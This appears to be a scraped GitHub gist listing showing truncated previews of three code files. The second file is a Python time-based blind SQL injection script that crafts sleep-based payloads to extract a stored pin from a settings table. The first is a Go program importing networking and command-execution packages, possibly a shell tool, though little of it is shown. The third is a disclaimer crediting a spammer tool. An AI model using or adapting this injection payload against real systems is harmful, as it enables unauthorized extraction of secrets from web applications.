This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| package main | |
| import ( | |
| "bufio" | |
| "net" | |
| "os/exec" | |
| ) | |
| func exists(cmd string) bool { | |
| _, err := exec.LookPath(cmd) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| import hashlib | |
| from string import digits | |
| pin='' | |
| length=7 | |
| for i in range(length): | |
| for i in range(1,10): | |
| query = "NULL' or if(((select value from settings limit 0,1) like '{}{}%' ),sleep(100),sleep(0));-- -".format(pin,i) | |
| key = hashlib.md5(query+'paid'+'1'+"aaaaabbbccccdddd").hexdigest() |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| """ | |
| DISCLAIMER | |
| ---------- | |
| This code is taken from # https://github.com/Noxturnix/Spammer-Grab # | |
| Edited by # https://github.com/BitTheByte # | |
| """ |
NewerOlder